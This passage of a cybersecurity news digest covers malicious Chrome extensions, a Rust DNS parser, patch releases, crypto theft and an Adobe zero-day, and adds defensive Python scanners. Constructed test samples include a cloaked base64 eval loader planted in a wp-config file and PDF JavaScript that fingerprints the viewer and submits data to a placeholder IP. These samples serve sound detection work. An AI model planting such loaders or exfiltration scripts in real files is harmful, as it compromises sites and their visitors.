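    for no, line in enumerate(lines, 1):
        for pat, why in RISKY:
            if pat.search(line):
                findings.append((no, why, line.strip()))
                break
    marker_at = next((i for i, l in enumerate(lines) if MARKER.search(l)), None)
    if marker_at is None:
        findings.append((0, "stop-editing marker missing (file rewritten?)", ""))
        return sorted(findings)
    flagged = {f[0] for f in findings}
    for i in range(marker_at + 1, len(lines)):
        text = lines[i].strip()
        if is_comment(text) or i + 1 in flagged:
            continue
        if not any(p.match(text) for p in ALLOWED_TAIL):
            findings.append((i + 1, "unexpected statement after the stop-editing marker", text))
    return sorted(findings)

# Constructed sample: a stock config with a cloaked loader inserted after the marker.
SAMPLE = """<?php
define( 'DB_NAME', 'wp' );
define( 'DB_USER', 'wp' );
define( 'DB_PASSWORD', 'redacted' );
$table_prefix = 'wp_';

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
    define( 'ABSPATH', __DIR__ . '/' );
}
if ( isset( $_SERVER['HTTP_USER_AGENT'] ) && stripos( $_SERVER['HTTP_USER_AGENT'], 'googlebot' ) !== false ) {
    @eval( base64_decode( 'ZWNobyAnc2VvJzs=' ) );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
"""

if __name__ == "__main__":
    for no, why, text in scan_wp_config(SAMPLE):
        print(f"line {no}: {why}: {text}")
```

Run it as `scan_wp_config(open("wp-config.php").read())` from the site root; legitimate customisations after the marker (a few hosts add cache constants there) will show up as unexpected statements and can be allow-listed once reviewed.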

108 Chrome Extensions Linked to Data Theft

🏷️ Cybersecurity · 🔥 Trending · 🔗 6 sources · Digest Score 0

📰 Full Story

Security researchers at Socket disclosed on April 15, 2026, a coordinated campaign of 108 malicious Google Chrome extensions that together have around 20,000 installs on the Chrome Web Store. The add-ons, published under five developer identities (Yana Project, GameGen, SideGames, Rodeo Games and InterAlt), report to a common command-and-control backend (cloudapi[.]stream) and carry a mix of malicious behaviors. Fifty-four extensions harvest Google OAuth2 identity data, 45 contain a persistent backdoor that can open arbitrary URLs at browser start, and several strip security headers to inject ads into YouTube and TikTok. The most severe sample repeatedly exfiltrates active Telegram Web sessions every 15 seconds, enabling full account access without passwords or MFA. Socket has submitted takedown requests to Google and Chrome Web Store security teams; many extensions remained live at the time of reporting. Researchers warn the operation resembles a malware-as-a-service model, with some code comments suggesting Russian-language origins, but no definitive attribution has been made. Users are urged to audit installed extensions, remove any listed by Socket, revoke suspicious Google app access, and terminate other Telegram Web sessions if they used the flagged Telegram add-ons.
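Socket's list is the authoritative removal list, but the capabilities those extensions needed (OAuth identity access, cookies, host access to every site, header rewriting, content scripts on Telegram Web) are visible in any extension's manifest without knowing its ID. The audit below is an example added to this digest, not Socket's or Google's tooling: it scores manifest.json files from a Chrome profile by those capabilities and by self-update from a non-Web-Store URL. The weights are my assumptions, and the two sample manifests are constructed (the update host in the suspect one is a placeholder, not the campaign's C2).

```python
"""Score Chrome extension manifests by the capabilities a data-stealing extension
needs. Example added to this digest; weights are assumptions and the sample
manifests are constructed. Works for Manifest V2 and V3 layouts."""
import glob, json, os

RISKY_PERMISSIONS = {   # permission -> (weight, why it matters)
    "identity": (3, "can obtain a Google OAuth token for the signed-in account"),
    "cookies": (3, "can read session cookies on hosts it has access to"),
    "webRequest": (2, "can observe requests"),
    "webRequestBlocking": (3, "can modify or block requests (MV2)"),
    "declarativeNetRequest": (2, "can add rules that rewrite headers"),
    "declarativeNetRequestWithHostAccess": (3, "can rewrite headers on hosts it can access"),
    "scripting": (2, "can inject scripts into pages"),
    "tabs": (1, "can open URLs and read tab metadata"),
}
SENSITIVE_HOSTS = ("web.telegram.org", "accounts.google.com", "mail.google.com")
ALL_SITES = ("<all_urls>", "*://*/*", "http://*/*", "https://*/*")

def host_patterns(m: dict) -> list:
    """MV3 lists hosts in host_permissions; MV2 mixes them into permissions."""
    pats = list(m.get("host_permissions", []))
    pats += [p for p in m.get("permissions", []) if "://" in p or p == "<all_urls>"]
    for cs in m.get("content_scripts", []):
        pats += cs.get("matches", [])
    return pats

def assess_manifest(m: dict) -> dict:
    score, reasons = 0, []
    perms = set(m.get("permissions", []))
    for perm, (weight, why) in RISKY_PERMISSIONS.items():
        if perm in perms:
            score += weight
            reasons.append(f"{perm}: {why}")
    hosts = host_patterns(m)
    if any(h in ALL_SITES for h in hosts):
        score += 3
        reasons.append("host access to every site")
    for sh in SENSITIVE_HOSTS:
        if any(sh in h for h in hosts):
            score += 2
            reasons.append(f"targets {sh}")
    # Updating from outside the Web Store means code can change without any review.
    upd = m.get("update_url", "")
    if upd and "google.com" not in upd:
        score += 2
        reasons.append(f"updates from {upd}")
    return {"name": m.get("name", "?"), "version": m.get("version", "?"),
            "score": score, "reasons": reasons}

def audit_profile(extensions_dir: str) -> list:
    """Walk <profile>/Extensions/<id>/<version>/manifest.json on a live machine."""
    results = []
    for path in glob.glob(os.path.join(extensions_dir, "*", "*", "manifest.json")):
        with open(path, encoding="utf-8") as fh:
            r = assess_manifest(json.load(fh))
        r["id"] = path.split(os.sep)[-3]
        results.append(r)
    return sorted(results, key=lambda r: -r["score"])

# Constructed manifests: a narrow, benign one and one with the stealer profile.
BENIGN = {"name": "Reader Mode", "version": "1.0", "manifest_version": 3,
          "permissions": ["storage"],
          "content_scripts": [{"matches": ["https://example.com/*"], "js": ["c.js"]}]}
SUSPECT = {"name": "Side Games Helper", "version": "2.3", "manifest_version": 3,
           "permissions": ["identity", "cookies", "tabs", "declarativeNetRequestWithHostAccess"],
           "host_permissions": ["<all_urls>"],
           "content_scripts": [{"matches": ["https://web.telegram.org/*"], "js": ["s.js"]}],
           "update_url": "https://updates.example.invalid/update.xml"}

if __name__ == "__main__":
    for m in (BENIGN, SUSPECT):
        print(assess_manifest(m))
```

On Windows the directory is `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions`; on macOS `~/Library/Application Support/Google/Chrome/Default/Extensions`. Anything scoring high that the user cannot explain should be removed, followed by revoking third-party access at myaccount.google.com and terminating other Telegram sessions, as the researchers advise.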

Google adds Rust DNS parser to Pixel 10 modem

🏷️ Cybersecurity · 🌍 United States · 🔥 Trending · 🔗 3 sources · Digest Score 0

📰 Full Story

Google has integrated a Rust-based Domain Name System (DNS) parser into the Pixel 10’s cellular modem firmware, the company’s first deployment of memory-safe code at that layer. Announced in mid-April 2026, the change replaces a risky C/C++ DNS parsing path with a no_std adaptation of the hickory-proto Rust crate and adds roughly 371KB to modem firmware. The goal is to eliminate an entire class of memory-safety bugs—such as buffer overflows and use-after-free errors—that have historically enabled remote code execution against basebands. Google’s Project Zero has previously cataloged severe modem vulnerabilities in Exynos-based chips, underscoring the exposure of legacy baseband stacks. Rather than rewriting the entire modem, Google isolated the DNS parser, routing untrusted packets through Rust before they hit legacy code. The company used tooling (including a custom cargo-gnaw process) to manage dependencies and maintain a compact footprint suitable for real-time baseband constraints. Pixel 10 users should see no change in performance or connectivity; the update is intended to harden a neglected attack surface and serve as a template for expanding memory-safe components in future devices.
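DNS name decoding is a good illustration of why that parser was worth moving: a name is a chain of length-prefixed labels that may end in a compression pointer, and a C implementation that trusts the length byte or follows pointers without limit gives an attacker an out-of-bounds read or an infinite loop from a single packet. The parser below is an example added to this digest, written in Python to show the checks rather than Google's hickory-proto code: every read is bounds-checked, pointers may only point backwards (which makes loops impossible), and label and name lengths are capped at the protocol limits. The packets are constructed; one of them contains the self-referencing pointer that hangs careless parsers.

```python
"""Decode DNS names the way a memory-safe parser must: bounds-checked reads,
backward-only compression pointers, capped label and name length. Example added
to this digest to show the checks; not Google's code. Packets are constructed."""
import struct

MAX_LABEL, MAX_NAME, MAX_PTR_HOPS = 63, 255, 16

class DnsError(ValueError):
    pass

def read_name(msg: bytes, off: int):
    """Return (name, offset just after the name as written inline)."""
    labels, total, hops, end = [], 0, 0, None
    while True:
        if off >= len(msg):
            raise DnsError("name runs past end of message")
        length = msg[off]
        if length & 0xC0 == 0xC0:                       # compression pointer
            if off + 1 >= len(msg):
                raise DnsError("truncated pointer")
            target = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            if target >= off:                           # forward or self pointer: a loop
                raise DnsError("pointer does not point backwards")
            hops += 1
            if hops > MAX_PTR_HOPS:                     # belt and braces; offsets already shrink
                raise DnsError("too many pointer hops")
            if end is None:
                end = off + 2                           # inline name ends at the pointer
            off = target
            continue
        if length & 0xC0:                               # 0x40 / 0x80 prefixes are reserved
            raise DnsError("reserved label type")
        if length == 0:
            return ".".join(labels) or ".", (end if end is not None else off + 1)
        if length > MAX_LABEL:
            raise DnsError("label too long")
        if off + 1 + length > len(msg):
            raise DnsError("label runs past end of message")
        total += length + 1
        if total > MAX_NAME:
            raise DnsError("name too long")
        labels.append(msg[off + 1:off + 1 + length].decode("ascii", "replace"))
        off += 1 + length

def parse_questions(msg: bytes):
    """Parse the header and question section; returns [(name, qtype, qclass)]."""
    if len(msg) < 12:
        raise DnsError("short header")
    qdcount = struct.unpack("!H", msg[4:6])[0]
    off, out = 12, []
    for _ in range(qdcount):
        name, off = read_name(msg, off)
        if off + 4 > len(msg):
            raise DnsError("truncated question")
        qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
        out.append((name, qtype, qclass))
        off += 4
    return out

def encode_name(name: str) -> bytes:
    return b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split(".") if l) + b"\x00"

# Constructed packets. GOOD: two questions, the second reusing "example.com" via a
# pointer to offset 16. LOOP: a question whose name is a pointer to itself.
HEADER = b"\x12\x34\x01\x00" + struct.pack("!HHHH", 2, 0, 0, 0)
GOOD = (HEADER + encode_name("www.example.com") + b"\x00\x01\x00\x01"
        + b"\x03ftp" + b"\xc0" + bytes([12 + 4]) + b"\x00\x01\x00\x01")
LOOP = b"\x12\x34\x01\x00" + struct.pack("!HHHH", 1, 0, 0, 0) + b"\xc0\x0c" + b"\x00\x01\x00\x01"

if __name__ == "__main__":
    print(parse_questions(GOOD))
    try:
        parse_questions(LOOP)
    except DnsError as e:
        print("rejected:", e)
```

The same checks carry over to the resource-record section (RDATA lengths against the remaining buffer, names inside RDATA through `read_name`); the backward-only rule is what removes the need for visited-offset bookkeeping.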

Microsoft's April Patch Tuesday fixes 165 vulnerabilities

🏷️ Cybersecurity · 🌍 United States · 🔥 Trending · 🔗 16 sources · Digest Score 0

📰 Full Story

Microsoft on April 14-15 released one of its largest Patch Tuesday updates, addressing roughly 165–167 vulnerabilities across Windows and related products and shipping cumulative Windows 11 packages (KB5083769/KB5082052). The rollout includes two zero-days: CVE-2026-32201, a SharePoint Server spoofing flaw that Microsoft says was actively exploited and has been added to CISA’s Known Exploited Vulnerabilities list; and CVE-2026-33825, an elevation-of-privilege defect in Microsoft Defender (publicly disclosed and linked to exploit code nicknamed “BlueHammer”). The cycle also patched multiple critical issues, including a near-9.8 CVSS remote-code-execution bug in the IKEv2 extension (CVE-2026-33824), numerous elevation-of-privilege flaws, Office and RDP-related bugs, and quality-of-life fixes for Windows 11. Security firms warned administrators to prioritise emergency remediation, audit externally facing SharePoint instances, and deploy mitigations where immediate patching is not possible.

Musician G. Love Loses $424,000 to Fake App

🏷️ Cybersecurity · 🌍 United States · 🔗 5 sources · Digest Score 0

📰 Full Story

Musician Garrett “G. Love” Dutton said he lost roughly 5.9 bitcoin — about $424,000 — after downloading a counterfeit Ledger wallet app from Apple’s Mac App Store while transferring his hardware wallet to a new computer. Dutton posted the incident on X on April 11, saying he entered his 24‑word seed phrase into the malicious app and watched his retirement savings vanish. Blockchain investigator ZachXBT traced the funds through nine transactions to addresses on the KuCoin exchange. KuCoin said it had temporarily frozen a suspicious account for seven days and noted that any further action would require formal legal steps. Researchers and outlets report the fake app appears to have been removed from Apple’s store, though Apple had made no public statement at the time of reporting. Dutton has urged caution to others and acknowledged the mistake. The theft adds to a series of losses involving counterfeit crypto software and highlights persistent gaps in app‑store and end‑user protections for self‑custodied digital assets.

🤝 Social Media Insights

Social Summary
This episode reflects both a criminal scheme exploiting app‑store trust and a critical user mistake: Ledger’s published warnings about seed phrases were ignored. It underscores persistent vetting gaps in app marketplaces and suggests more scams and greater pressure on stores to improve controls.

OpenAI launches GPT-5.4-Cyber, expands TAC program

🏷️ Cybersecurity · 🌍 United States · 🔥 Trending · 🔗 17 sources · Digest Score 0

📰 Full Story

April 14–15, 2026 — OpenAI unveiled GPT-5.4‑Cyber, a variant of its GPT‑5.4 large language model fine‑tuned for defensive cybersecurity, and announced a scaled-up Trusted Access for Cyber (TAC) programme. The model is designed with a lower refusal boundary for legitimate security work and adds capabilities such as binary reverse engineering to analyse compiled software for malware and vulnerabilities. OpenAI said GPT‑5.4‑Cyber will be rolled out iteratively and only to vetted security vendors, thousands of verified individual defenders and hundreds of teams; the highest verification tiers unlock the most permissive capabilities. Access is governed by stronger know‑your‑customer checks and may require concessions such as restrictions on Zero‑Data Retention in some deployments. The announcement follows Anthropic’s early April release of its Claude Mythos Preview under Project Glasswing and highlights differing approaches: Anthropic’s tightly gated, big‑tech partner model versus OpenAI’s broader verified access. OpenAI also cited complementary efforts such as its Codex Security tool, which it says has helped fix over 3,000 critical and high‑severity vulnerabilities, and framed the release as part of an iterative safety and ecosystem resilience strategy.

Adobe patches critical Acrobat Reader zero-day exploit

🏷️ Cybersecurity · 🔥 Trending · 🔗 7 sources · Digest Score 0

📰 Full Story

Adobe released emergency patches in April 2026 for a critical zero-day tracked as CVE-2026-34621 that security researchers say was actively exploited for months. The flaw affected Acrobat DC, Acrobat 2024 and Reader DC on Windows and macOS and was disclosed after researcher Haifei Li of EXPMON analyzed a malicious PDF sample first seen on VirusTotal in late 2025. Attackers used obfuscated JavaScript inside crafted PDFs to fingerprint hosts (collecting OS and Reader versions, language settings and file paths) and selectively deploy a second-stage payload capable of remote code execution or sandbox escape. The initial severity rating was 9.6, but Adobe reassessed the attack vector and set the CVSS score to 8.6. Evidence from researchers points to targeted, selective profiling, with some lures referencing oil and gas themes and Russian-language content, raising concerns about an espionage campaign. Adobe confirmed exploitation in the wild, urged immediate updates and provided fixes across affected builds; agencies including CISA added the flaw to their known-exploited-vulnerability lists, which impose remediation deadlines. No practical workaround was available, so patching and endpoint review were recommended as the primary mitigations.
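The triage question for any PDF in the mail queue is whether it runs code on open and whether that code profiles the reader before doing anything else. The script below is an example added to this digest, not EXPMON's or Adobe's tooling: it normalises PDF name escapes (so `/J#53` is seen as `/JS`), inflates FlateDecode streams so dictionaries hidden in object streams are scanned too, counts the auto-run and scripting keys, pulls inline `/JS (...)` strings and checks them for the `app.viewerVersion` / `app.platform` lookups that characterise host fingerprinting. The sample is a constructed, minimal PDF with just enough structure to exercise the checks; it is not the sample from the story and is not a renderable document.

```python
"""Triage a PDF for auto-run actions, embedded JavaScript and fingerprinting code,
seeing through #xx name escapes and FlateDecode streams. Example added to this
digest; the sample PDF is constructed and deliberately minimal."""
import re, zlib

FLAGS = [b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch", b"/EmbeddedFile", b"/RichMedia"]
FINGERPRINT = re.compile(r"app\.(viewerVersion|viewerType|platform|language)")

def inflate_streams(data: bytes) -> bytes:
    """Replace each FlateDecode stream body with its inflated content (others kept)."""
    def repl(m):
        try:
            return b"stream\n" + zlib.decompress(m.group(1)) + b"\nendstream"
        except zlib.error:
            return m.group(0)
    return re.sub(rb"stream\r?\n(.*?)\r?\nendstream", repl, data, flags=re.S)

def normalise_names(data: bytes) -> bytes:
    """Resolve #xx escapes in PDF names so /J#53 becomes /JS."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)

def triage_pdf(data: bytes) -> dict:
    buf = normalise_names(inflate_streams(data))
    hits = {f.decode(): len(re.findall(re.escape(f) + rb"(?![A-Za-z])", buf)) for f in FLAGS}
    scripts = [s.decode("latin-1") for s in re.findall(rb"/JS\s*\((.*?)\)\s*(?:/|>>)", buf, re.S)]
    return {
        "flags": {k: v for k, v in hits.items() if v},
        "auto_run": hits["/OpenAction"] > 0 or hits["/AA"] > 0,
        "has_js": hits["/JS"] > 0 or hits["/JavaScript"] > 0,
        "fingerprinting": any(FINGERPRINT.search(s) for s in scripts),
        "scripts": scripts,
    }

# Constructed sample: the catalog's OpenAction points at an object stored inside a
# compressed object stream whose action type is written with #xx escapes.
INNER = (b"6 0 << /S /#4A#61#76#61#53#63#72#69#70#74 "
         b"/JS (var v = app.viewerVersion; var p = app.platform; "
         b"if (p == 'WIN' && v >= 20) this.submitForm('https://203.0.113.9/c?v=' + v);) >>")
SAMPLE_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 6 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"4 0 obj << /Type /ObjStm /N 1 /First 4 /Filter /FlateDecode >>\nstream\n"
    + zlib.compress(INNER)
    + b"\nendstream\nendobj\n"
    + b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    print(triage_pdf(SAMPLE_PDF))
```

A result with `auto_run` and `fingerprinting` both true is worth detonating in a sandbox whose reported viewer version matches a vulnerable build, since a selective loader will stay silent otherwise. Run it as `triage_pdf(open(path, "rb").read())`.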